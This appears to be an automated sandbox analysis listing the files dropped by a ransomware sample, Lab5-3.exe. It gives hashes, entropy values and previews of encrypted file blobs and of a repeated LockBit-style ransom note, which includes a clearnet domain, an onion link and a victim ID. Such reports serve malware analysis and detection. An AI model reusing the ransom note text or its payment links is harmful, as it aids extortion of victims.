                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15184
                                                                                                          Entropy (8bit):7.988145054966807
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:JWxDCOiKp9zMMwZGgkDpYJTFlNcWfdMAm+7AQbq62qBhtb:CCOiKpl5wZqDiJTFLv0QbAqBhZ
                                                                                                          MD5:10D27C940DAB29C1B6B31AEAE42A50F6
                                                                                                          SHA1:00AF383F0754E7B4E63533F7BD0B1E2B4E7A433A
                                                                                                          SHA-256:170486A02DC91B4A2F94F5AA38E9FA5A6463015BCD0F01CB8A42D74CC6E0355E
                                                                                                          SHA-512:DE5DE48483B4F4900D087979456772F26153EEB91EC88FF45376267FEC8D824A0283087C8E5ED6626490C135FFF02E059251062C3290BC0E7B1858592FDF07DF
                                                                                                          Malicious:false
                                                                                                          Preview:b.../J..&.z.......z......<hS..H..=.s.a8....Ig..df.3n..C...S...H)2f.n>..b.E.%@...K...?....H3.%..s.....H.... b..g.......J. 1h..h..9|g...............e........[$.S~..bXQ....\..q........B<].n.....l.rj...O+..3.[..T.Y-.^..2R...=.....x5J...60T....D..u.Fn.B..Hd/B .20.'...F.Gm(..*.x..cc{g.(?%......euB....C....=...X..J...k.yp.R....>$6.q....f.q.+.....B..K/q...~."....sl6R0.:.......$.;.t9V..|..aI..........1..u%1E.S ?#,.....w..Z?v.F..n.0.......Qb.m..S._..d.s......aK......t.O@..... j......0....h...x:.F.}..J...e...(..i...X}g....h.0.B..,f...>.wd..%..w.h.{kLn:q.....*..o.p.....n=.8&1V.N.X..e....-...B.....z.<.....!.<....x$?... g.F....)...G.*+).:....;...Y!q:e....p...|....tJ2WpO....:..JBwZ1`...O[%V.excj_....QQ*..=B,P.C......w.j..'...`....D+......w....h+.....$...K*w.R.22.!j..L..............Di......R....=p4\.U.g60....4..w.].r8...;..AAq.k...Z..L.....%..p.lm74e..e..js=..)F..d..X.|M.Z~.I.p..R.@Wf....G...}..KM...\.}.<....x...uA.. :`.oz...S..Y..{...Q..].2
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9888
                                                                                                          Entropy (8bit):7.981655125056672
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:9norLxQ3LM2WXnC4wS59U84ytOGRm/tJdjKNMlVpD5kRvEx800Cb:FQVQMXCS9If/PdjK2bF2o80tb
                                                                                                          MD5:E82F0ED17A54FB3E327F0371D106A2CB
                                                                                                          SHA1:8C60B55397ACE38B4175E01BE7852F92C9CF1A9C
                                                                                                          SHA-256:9F93D38E38918CFA31592519F1412BAD2D82514291ED6CD2F46F5C7D6D40B6B7
                                                                                                          SHA-512:5E91F64022FA25A41954F32F4DBF06FD812F51398B8F451A599BA07F6A87DA2B991E6A31239DEC499652B5884900816296538A417183446CA87A16633D603890
                                                                                                          Malicious:false
                                                                                                          Preview:...w5`.h.[.i,.e8|\P..t.2....Gi7..4=.t.G.SQC),|..H57..z..;-.A.ub.....3..L....1..:..#.F?....Q......\...z.qL..RBbm.q.S.......W......1..a....y.;<.B_..... ........w....JUz......\>.!f=.....U.`.S.R..........yF..s.........U..{.Du\[.%..J=.?=eq..v...:9.O..s...f...II.zm_p..H..,N.C-.,6.{>.....y8...c...jA..H...J..C.I...'....S.Oz...r.y.....q....g.........d=.....8..;m..k..E.Jp...P..R+.\.T....{.5.....;..N...4..w..L.*q.]b!n.E".......`..0.......,._._....... b>'2...E..b..h.....]Q.O7..|.V.g....}......ZGC.....][/T.H.,P?..1`..Q .VY....6:.A{.%....d.....+Nu.^.#./......@O.....vP..m....7..thW......pB...3...t~...?(.!.....R...S/0...k..K...s...X....x.'...P8.....c.B...."...1.uQ..9..q......j\X...z.6.. 1.o..A.k..oe.Z...\;.&.M].u..CxS.......<W.u%.......t*.....QM..b-...~..,r.?G.+...l.G?...H.>..((?............"O.Z.E.8....r...%.n....7p.).>..JS....k^_..Ou.F[a.-Z...'=9.d$r}..CX.....]...#.K....y.A3.A5,...t.Q.xF.FP..AX.IQu..c:.H...[;.qR"(.....o$.6.7..i...c...)...].?.=...[f.Ku...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9936
                                                                                                          Entropy (8bit):7.982497238548814
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:LTmI3jTU8gBg+NRCuppmiwWk6yasIB5B1Bu2XVLgbS639Kc9Zxp0Cb:LTmujLENkuvmitwIzM2eGAKUjptb
                                                                                                          MD5:965165C450B5A479EB6BE63D23305C71
                                                                                                          SHA1:55F50B630D2E4AE6A152A6F7FB18E8E10373BEF5
                                                                                                          SHA-256:3E347CF58E39E89E4C47ADABE6B4C3E475F8D35112823991A70C3AD4D6A07BF4
                                                                                                          SHA-512:ABDBD1090EDA39E1CECD37CD80174B51B53CB6007C8536A0BB9773012B4FDFCBED57F71FC95EF5267A1AEA8E12AFEF6800F9F8A6FF850219A875C2C9B1B9A705
                                                                                                          Malicious:false
                                                                                                          Preview:{....c......u.q.JRy~.+M..e.H.#..B.8L.@. ..0...\~.t.W8~.$.,K=......".7..H.k/}..b..=C. a[N2.....JC....f{.S...~}JXC.0d..cI..#....5..j@,...2.J.|q....&..[...d..Y.g.J..y...........pfa/9!!}...Jn......./...9:h.Q......V.a...&oUO")C.^TC[..[.'m.....4v.i.QF..0...~w`.....f..K....j..7g.y.yR...'......7^f..4...r...!...J...*...'..LR....oU.....`.....@..`}1.1...)......e.F..FY{0...i....8......".......]e..(....9..^i...%{!h.=..k..~M.7TII.}Z...DO.J..mn.v@..TP!]..EW...9.pyd..m."h..H.....@3...Ktrk.1.)...$.C.i.r..K)c..'.../N...D..e.A'..Z....8..^H...t50...%....=+.p..0.?o..|F.vjI./...=`.Z....j...\...........%..lW..j..A.......}.....O......J&..\....0....Y.G\./.....$...n../..4...M\..u.{...a..S.....pi......B..T.~.&)..U..d.....K.[...$..;...+...$eJ..$...2....tD.. ..(..6`4..\1w....v.o~/..o.t|...-..c.-9..V.LT.p.s.o.V....rZ.G.`g...x..[ep...b...pL....e.......CH. [$!O.D....y%.#.B..[+.r4DG.......5..,.7....G.{....e.M.*.6...z......h..@6....o.5.}....a.fP'{...)..<a...b..{..p.).Q%...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.930144229703616
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:wxWALysafpex44/b+OeNfs3CHfUTid3hBaUoSGFcmeykEdEElU92i:GHLys68xVjHeNfy9Gx0uKeY2ElUJ
                                                                                                          MD5:79B497C655F2085627FE4BAB192146D4
                                                                                                          SHA1:1CD9FBADB97C781339D671F0BA2D3C3BAD1822D1
                                                                                                          SHA-256:7F8E1B4DA85A76AF08F9D714CA5D7F024DAD1D757EC688E937FE267E398FA4DD
                                                                                                          SHA-512:14D351D067834A85C229E81A5C12C639FDCF979F5E15986CAB5DC95459A5771A73087B3D4C53FBB37EAA70D1424F3A04CDC427D329188F157BD83C805362CEEE
                                                                                                          Malicious:false
                                                                                                          Preview:.gq~...k.[.........E....K...V../.-.R.N./.\.J.D.FR x.BZ\......Mw,.-.Bd...).@3'5.J...U.]...q$........&.P[M..._......8......K=."..>....;wd4.....\:....Vg&...4.D...-....u.V.OW6%f./.5.:..>`...!...Y. .]5o<.fQ|p.\Oh..wl....#h.n..pF....[@.Z.g.UE...W...c..6H.g*.o.ez...Wj...E........k;.Y^.J?.....?.....s...x.T\B.J...%1.=u. 9..N.t..r..Q...geO...8......O.....g.t.>C....^.s....I$...@J......=D..y.m4g~j;Kj#@w.....|.m.f..|1.....xUj....8EV5....I0p.......}zv.E.3..[./....S~|.Q[OS.....X^m.N.4j2.3..};..^..^ Nz.p.....%rD..'..Wa-{._w..wb.Y....Z..</.t..Mh$.V.b.'.#H..tu|.2*d.Q....=[..Y..d.c.i..x.|..$...s.s.r..W.....q..1<...L..../_'..2.....u.......m...LN..b..5.I.s.....B2...~........{N.4x}.L..c.k..{.1.b..).......%}."+...{....k0.,^.TwG]~!hA.,...?.S....:..b.H..Az..9....o.w..A.'...K/....xLV..@'.<U.qw.nL.....QXo.....>....SL......T.,WA.....r.....z!.`*.........P.t.....6....{$.. ....Oz.O3x..~.....|..j+a.a.. q.V...;.......O.:.y...(..$k.8...gI8.-.$...Om,P.B.W..g.'..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):34640
                                                                                                          Entropy (8bit):7.994619505916414
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:jEOn6vt6iMwjbdLxXVVeMxxcG4IsvcT0FZ:jni7/vXjxcG2cT0FZ
                                                                                                          MD5:C543D8506CAC43FC77B25776A6085654
                                                                                                          SHA1:236C5EE0106A4B58F31D753DADF035B1CD38FEE1
                                                                                                          SHA-256:2E1CA0345C67D1629095E37AAE65646C1E35C22E7FCF3065C326401B5B10405F
                                                                                                          SHA-512:7B922592F6377343D1A58B6796083B925F86D2428194EB228A35FFBCCC7E109A74F6181DE5FBA0E3249772549104E32883C3DBB66B7A3771C6BF5CD80DD50B6A
                                                                                                          Malicious:false
                                                                                                          Preview:....|[s".TT...8/....w..]..w..n.T."'....yuG...p.!...M.).E.......>.t.,Hg....3.t....G..M,A{..p..x...ZB...5.:|..S.B.*.\.6....%.....[...c....k..y.$x....}.).....:mw..Ix..`.]...+..5z0...A.:{.w{.lR7..hF?V..+wgV...@.#..m2.m%]^..+...4....6..:..J..(.Dh.h..Y..b\./+..X...q.....IU...L.d.q.{....Q. ..s..%.\.......|...=W.....ink.r...g0gE.3.~.i,...N.f..|aF.+L.DJ..;w.Fi..#...........9...w.m......" .r......Rl...J.V..... *Y.P..a.t....A....5.}y.......'....,...1J.X..#.8n.B.......V*.9.x@G..N.t=....q.K...."E.............)..".....f.._..>_(.q..*R.k.......H...g...I...sw...PT.n.j..)..3>..1......G3@". G,.|f$...x..me.6..X...._.I..*9.A............k.. ..r..H...Bf......(+...n.H-(..*.pw....... ......T..'...P/N9M...}TJzy~...-oCc...zP......{.....}.*.a&;Q..o........{...Pk......[..D..^8pb..y.r..E1.........b.R.....OEMTv%.<.pv...JM..@.$~.....B...o.7...S....r .a.Y'....]*...D.+......3.....xj......G.FyUHyV.9...Ef.......{........rX......y5 S+..f......9......A...P.R.....xf...._W.....\
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16624
                                                                                                          Entropy (8bit):7.990555765570216
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:DGs5qXH/JqH5KW8yu0w56kTiiZBXP4jYpEcr5yC0GEJyspitb:fq28wMQiZ97QCBscZ
                                                                                                          MD5:AB570D5620EA5FC409BD1163CDF605D7
                                                                                                          SHA1:B43563CB3956A9D08757787A20AB1F3314A543B8
                                                                                                          SHA-256:793ADBCD4341005D85219A5E698B23656ED639776272C2B87DDDC3096760AE1C
                                                                                                          SHA-512:FE452FE612F3C04FF12EB00F1A69449E4F8E4D11E1B3AF7BFA998367812DE9F73CA1C7A000A26778C3B5152B7269D361174FF2F8C6C17EBDDDDBAFD907B916FB
                                                                                                          Malicious:false
                                                                                                          Preview:.5^.of.....&...".Q...+.S.H...r.:....E.5.._..v......).v.]]@c.<'0.n.w.*..y.M..?.....].<.;+]Gp6..g.c....,8..:>f!.71..l..u.p..#..Hl...Vg.#..j.:`....m.i.C@F.E..>.u..qL..9......j.._..z`.DFe.........1..C5...W..#NHmk.....-5q....^d.7.t+J]<B...$..|.:..l.GD..J1.EP.,i.....V.....-...9.4...+"8.:K6.6c&.g..."....L....h.-..3..s)M....-....Qh..V?.yG...._./A~C......:..].....UU#.{Q. ._..B..y.\k"|.3A ..\.2._..dF.....u.`C.....;T._.........u....[...\....K@h..,.F.V...........:;E$.v.s.'|.....@.L.9..........J..c..3....,...V..M....2..Y.0.hR..k...'ti.tB[..x.<......k.........X.........fY....EW....r.T...9.j6M.....u)..&.-t.SVP..oH......=.......).Sm%E.?#..;0..o7t..{......;....594....sYhA.........F.'.............%.F[g..h{..O... _....T.>.......e...F......8.....{...'.....p..J.\..(..7.V.[e.}....F.....p.....e}$f...j.Qc...v.t.qY.....E..$..+{.._.b.:..k.O(e....g......[..P.h....Wx4.n5.\.O0[.n/.....Peu...........rX.}.K'80I...>.H.......2.....=.].c.N..55.5..;L........2F....-.&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5456
                                                                                                          Entropy (8bit):7.967469733679319
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ccnELLFv7r8p9/KegAcUe9svig6b7CX7JqGiYxOJhTS1vOGx0uKeY2ElUJ:3nKLFH8p9/KegnCX7JqGmJKvd0Cb
                                                                                                          MD5:2BF6AEEC0528393645A9A96D3D66C716
                                                                                                          SHA1:D110E4848A6D9B0E1763D8DF0DB398F7FA2C9FC4
                                                                                                          SHA-256:7E40CBD216D1C2AF958319199BECE637F0AD6ED0DBA9A92AFF4C1905C6E7157A
                                                                                                          SHA-512:C5BBFAC71D8B0971B714CF498F4B98EDF0A447BDFD20FC43F1E569686BCFEA6D595F2B9CDEA6C58C46E943A4CDCAB559F36D7D6A7FDFA2091951E8ADFC61C43C
                                                                                                          Malicious:false
                                                                                                          Preview:D..E...).v.|.e`..m2..k.>..:J.e...V]B..6*ZQ.3d.x..{.x.D....).j.......AZ&..C..#.TA..=.l...c.......(p.........z...W}...H....M.3.b......k..K..jW...e....S.N....vB.AK..r..rn.Qo._........*.o.....rf....j.Td..,=2.W .oz....<W..k.V.,X.*..j..W..a5.W..c..%tDd....(.!...I.U9..N..?.3S........I[.x..-...h.f...n.....B.....8...e.{.+...J....Z.%8=.*.O.\2..r....v.=.T..hBV......,.i..o...._2.r.7|X.N..N...}{.).M.-..PW.!...`U.\].-....&;.......D.)A..".. 4.....S....J.L.O...{.G.........2KfI{y.._C.'.......).(Daq.V.7...f..4fW..+.FN../WjQ0U...-J.!.....}.|.LW.d.!.....Y..8...r.v.y....*;.......ci..jK..../...Z....9.N/........S..Edk.....|......<H.......i..D.9.....KJ..;..'g&....R....?.+P7.W.9..W.N......b....oY.%.G.z.AXi...r..gfb..]]..I-=......-....j.k(..VN...TQ.1.....]x..7.....p..IOl.......6.rO/.....=].!e.W.....x.wH....s..@..T..N;'_.>..x..sH.l&.....&.y......*..C.._......v..!m.Ny:0gz...uH...W'm.NKp{.......h.&...2.,...0......l .O.'".D.V&..jd.6.vj.m.(..K}.8.NvPTV.`.zM..x
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2992
                                                                                                          Entropy (8bit):7.943090761183234
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:wfSoWLnluex2Kmj0ABQAJ5r+JEUEJ4a28yhoVHfUTid3hBaUoSGFcmeykEdEElUJ:wfStLnlzf20KQAHr+JU4a28UouGx0uKk
                                                                                                          MD5:A854FBFCEFC9DBB326458C362CB1EFB0
                                                                                                          SHA1:5E7BEAB0FBDF0C8D8271FBDEE13BA3D46D66D338
                                                                                                          SHA-256:772EFC91F32E0AEEE8E1B8D6D72B0068259DCA1C87DD1CD5E51317947AAE6C3D
                                                                                                          SHA-512:791B50BA70E01439DFE45CE4D3E6A899EDFFBD3C31CA0AEC0B29C5E6D25E7F1EA55218904D163718414846F0A7F53C68E86A67F7544A8C363CC65F7AC651CDB0
                                                                                                          Malicious:false
                                                                                                          Preview:...:..mo.......|...c...N.....}.....kHk....|n..{...O6rg.!..G......Dd....zFN.......m5.Q.Z{...b..+.....9....8].;?..f.._..ZY.>A.O....l..S..{...>...o....VE.f`f.!y.=eF.@....5..P..F,./7=.o..i........H.M.....q.......C.F,..k......l......M.[. ....uNg.Om.......7..RR..<.._.f...b..............=......z...{.G).'..B..~%.(Q`...d!Z.ig....K.aT.a.hT.....5.0n...B..71....4:*7u....P.Vz/.t..wv.f>..c...W...,_.e....e...j.B..i2..?.>?]5..}..e.v.....LW.m.....0..CC.4.F..Qc.........I..r.}.*....S.....N.h...."..\r....!...h....dWx;r........Hh.)..@.) ..*23y.W..i.%...\....>..h.O..0..].....DA..-l....>.d.+Qt.I........+.b.k.Y........[.x.....@B...0.W..]&....e;..qi.....ed.!.=..i.`3...D...l.f.[f..ujJ..O.".....{.O.g.b.Unl. .....l6..}@..@>s.&....Y..b..o...M.....X...iT.UpM.<.k.+G......_F..<$..D|...,.VQeO....G.........v.....w....nl...40U..a30....Z.'2.S.".3..F Ml...MM.M...w.A...w.(...G........y...3.U..)d_2...........F.......v.P:..pQ..o...b......p.~5$j.3.T......]h~}.:..(.....[`kl
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
